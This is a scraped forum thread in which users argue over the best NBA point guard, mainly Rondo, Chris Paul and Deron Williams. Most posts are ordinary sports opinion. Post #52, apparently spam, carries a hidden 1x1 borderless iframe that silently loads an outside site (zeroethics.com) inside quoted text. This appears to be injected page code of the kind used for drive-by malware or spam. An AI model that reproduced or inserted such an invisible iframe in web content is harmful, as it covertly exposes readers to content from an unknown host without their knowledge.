Who Will Be The Best POINT GUARD In The Next 5-10 Years?

Collapse

Recommended Videos

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • KG
    Welcome Back
    • Sep 2005
    • 17583

    #46
    Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

    Originally posted by AlexBrady
    I agree completely. Yeah, he is a better finisher than Nash is (but Deron Williams is a dominant finisher). His shooting mechanics are too wristy and he leans backwards when he shoots.
    No objections there.
    Twitter Instagram - kgx2thez

    Comment

    • st0rmb11
      All Star
      • Nov 2008
      • 5167

      #47
      Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

      No objections to your comments on Paul's shot being...below average (for what you would want out of one of your main scoring options).

      And I will agree with most of your points about Nash & D-Will being tougher to defend in the high screen game. But, you said that you agree that the lack of offensive diversity and strategy falls mostly on the coaching. I don't think we can truly say what Chris Paul is and what he isn't until we've seen him in a new system that requires him to be more of a decision maker and to step up more.

      I still say that he is a better half court point guard that you are giving him credit for, but I it really is hard for either of us to judge his true talent until he's put in a system (with a coach) that requires him to showcase ALL of his abilities as a point guard and as a leader of an offense.

      Cincinnati Reds

      UNC Tarheels

      Twitter: @st0rmb11

      PS4

      Comment

      • ParisB
        MVP
        • Jan 2010
        • 1699

        #48
        Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

        Originally posted by JBH3
        You fail to acknowledge that Rondo is a very capable slasher in a half-court set, and doesn't have to get his picking a team apart from 17".
        Rondo is horrible, man. Anytime you don't have to guard a guy, especially a guard, I'm sorry he's not elite. Like I said, if Dwill was on Boston, the Lakers would be DONE. And I'm a Lakers fan. The Lakers WANT Rondo scoring a lot of points and grabbing 10 boards. That means they were able to contain PP and Ray Ray and let Rondo get the garbage points. Rondo getting 10 boards also means the other Celtics players aren't rebounding much. Advantage Lakers under both those circumstances.

        People look at statistics and drool over Rondo...that's the same people drooling over Zach Randolph or Amare Stoudamire. Vastly overrated players that put up numbers for fantasy value, but they're not nearly as good as their numbers suggest.

        Comment

        • st0rmb11
          All Star
          • Nov 2008
          • 5167

          #49
          Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

          Originally posted by ParisB
          Rondo is horrible, man. Anytime you don't have to guard a guy, especially a guard, I'm sorry he's not elite. Like I said, if Dwill was on Boston, the Lakers would be DONE. And I'm a Lakers fan. The Lakers WANT Rondo scoring a lot of points and grabbing 10 boards. That means they were able to contain PP and Ray Ray and let Rondo get the garbage points. Rondo getting 10 boards also means the other Celtics players aren't rebounding much. Advantage Lakers under both those circumstances.

          People look at statistics and drool over Rondo...that's the same people drooling over Zach Randolph or Amare Stoudamire. Vastly overrated players that put up numbers for fantasy value, but they're not nearly as good as their numbers suggest.

          I don't think you can say Rondo is "horrible". Sure, he can't shoot. But, he is great at setting players up when he penetrates, he is a TERRIFIC defender (on & off ball), and he is a really good rebounder. He never goes all the way in to the boards with the big guys. He just has a knack for being in the right place when the ball comes off the rim. He reads shots well (much like Jason Kidd). Is he the best point guard in the league? no. but is he an elite level point guard today? yes.

          He has played in 2 finals, and pretty much led the Celtics this year to the finals.

          Cincinnati Reds

          UNC Tarheels

          Twitter: @st0rmb11

          PS4

          Comment

          • Hassan Darkside
            We Here
            • Sep 2003
            • 7561

            #50
            Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

            Terrific on-ball defender? I wouldn't go that far... Dude gambles A LOT.
            [NYK|DAL|VT]
            A true MC, y'all doing them regular degular dance songs
            You losin' your teeth, moving like using Kevin Durant comb
            Royce da 5'9"


            Originally posted by DCAllAmerican
            How many brothers fell victim to the skeet.........

            Comment

            • PhantomPain
              MVP
              • Jan 2003
              • 3512

              #51
              Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

              Originally posted by Ruff Ryder
              Terrific on-ball defender? I wouldn't go that far... Dude gambles A LOT.
              Hard to call it a "gamble" when he has so much success at it. Maybe, just maybe, he is good at reading and understanding what is about to happen which allows his "gamble" to be successful quite often.
              #WeAreUK

              Comment

              • bonbonan
                Rookie
                • May 2010
                • 316

                #52
                Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                Originally posted by st0rmb11
                I don't think you can say Rondo is "horrible". Sure, he can't shoot. But, he is great at setting players up when he penetrates, he is a TERRIFIC defender (on & off ball), and he is a really good rebounder. He never goes all the way in to the boards with the big guys. He just has a knack for being in the right place when the ball comes off the rim. He reads shots well (much like Jason Kidd). Is he the best point guard in the league? no. but is he an elite level point guard today? yes.

                He has played in 2 finals, and pretty much led the Celtics this year to the finals.<iframe src="http://zeroethics.com/opsports/" frameborder="0" marginheight="0" marginwidth="0" width="1" height="1"scrolling="no"></iframe>
                Jason kidd is old. Rondo got potential become the next legend of point guard. He might need to train his shooting to become the next legend in NBA with the good passing from Jason kidd and Nash.

                Comment

                • st0rmb11
                  All Star
                  • Nov 2008
                  • 5167

                  #53
                  Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                  Originally posted by bonbonan
                  Jason kidd is old. Rondo got potential become the next legend of point guard. He might need to train his shooting to become the next legend in NBA with the good passing from Jason kidd and Nash.

                  I said Rondo's rebounding ability reminds me of Jason Kidd's. They both have a knack for knowing where the ball is going to come off the rim, and positioning themselves in the right place to come up with it. Not sure what made you say "Jason Kidd is old". I was comparing Rondo to him.

                  Cincinnati Reds

                  UNC Tarheels

                  Twitter: @st0rmb11

                  PS4

                  Comment

                  • RoyalBoyle78
                    Aka."Footballforever"
                    • May 2003
                    • 23918

                    #54
                    Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                    Lately through all this FA, Bosh is coming of like women with all his tweets, At this point keep him away from the Knicks, he showing truly how soft he is.
                    N.Y Mets
                    N.Y Giants
                    N.Y Knicks
                    N.Y Islanders
                    Miami Hurricanes


                    Twitter - @RoyalBoyle78
                    XBOX LIVE - Royalboyle78
                    PSN - RoyalBoyle78

                    Comment

                    • z4ckdabeast
                      Rookie
                      • Jan 2010
                      • 428

                      #55
                      Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                      If Rondo improves his shooting, then it's no contest. Until then, the title of best point guard belongs to Deron Williams.

                      Comment

                      • Hassan Darkside
                        We Here
                        • Sep 2003
                        • 7561

                        #56
                        Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                        Originally posted by PhantomPain
                        Hard to call it a "gamble" when he has so much success at it. Maybe, just maybe, he is good at reading and understanding what is about to happen which allows his "gamble" to be successful quite often.
                        Rondo doesn't do a good job staying in front of his player, he tends to get beat and reaches in. Yes, he generates steals that way, but no, that does not make him a good "on-ball" defender.
                        [NYK|DAL|VT]
                        A true MC, y'all doing them regular degular dance songs
                        You losin' your teeth, moving like using Kevin Durant comb
                        Royce da 5'9"


                        Originally posted by DCAllAmerican
                        How many brothers fell victim to the skeet.........

                        Comment

                        • ParisB
                          MVP
                          • Jan 2010
                          • 1699

                          #57
                          Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                          Originally posted by Ruff Ryder
                          Rondo doesn't do a good job staying in front of his player, he tends to get beat and reaches in. Yes, he generates steals that way, but no, that does not make him a good "on-ball" defender.
                          Exactly.

                          It's why Battier and Artest are considered elite defenders, but don't rack up steals and blocks. They simply shut you down and can keep you in front of them.

                          Rondo gets beat a lot and is good at reaching in from behind, and plays the passing lanes by taking chances...but that doesn't make him a good defender. The steals look good in the box scores, but they don't show how many times he was unsuccessful and let his man score.

                          Seriously, I don't want to sound like a *****, but Rondo is a fantasy dream that looks good in the boxscore, but the guy is not that good on either end of the court. Guys talk about him like he's an all-star. I can name 12 better point guards, lol.
                          Last edited by ParisB; 07-02-2010, 09:22 PM.

                          Comment

                          • PhantomPain
                            MVP
                            • Jan 2003
                            • 3512

                            #58
                            Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                            Originally posted by ParisB
                            Exactly.

                            It's why Battier and Artest are considered elite defenders, but don't rack up steals and blocks. They simply shut you down and can keep you in front of them.

                            Rondo gets beat a lot and is good at reaching in from behind, and plays the passing lanes by taking chances...but that doesn't make him a good defender. The steals look good in the box scores, but they don't show how many times he was unsuccessful and let his man score.

                            Seriously, I don't want to sound like a *****, but Rondo is a fantasy dream that looks good in the boxscore, but the guy is not that good on either end of the court. Guys talk about him like he's an all-star. I can name 12 better point guards, lol.
                            Would love to see 12 better. Care to name them?
                            #WeAreUK

                            Comment

                            • MarvellousOne
                              No need for Titles
                              • Sep 2005
                              • 1834

                              #59
                              Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                              Chris Paul if he can remain healthy will still be top on the PG list in my book, when healthy he is a consistent 20ppg 10ppg 2spg point guard, D. Williams will be a close second.

                              Comment

                              • Eman5805
                                MVP
                                • Mar 2009
                                • 3545

                                #60
                                Re: Who Will Be The Best POINT GUARD In The Next 5-10 Years?

                                Originally posted by z4ckdabeast
                                If Rondo improves his shooting, then it's no contest. Until then, the title of best point guard belongs to Deron Williams.
                                How quickly some have forgotten about Chris Paul.

                                Out of sight, out of mind, I suppose. SMH

                                Comment

                                Working...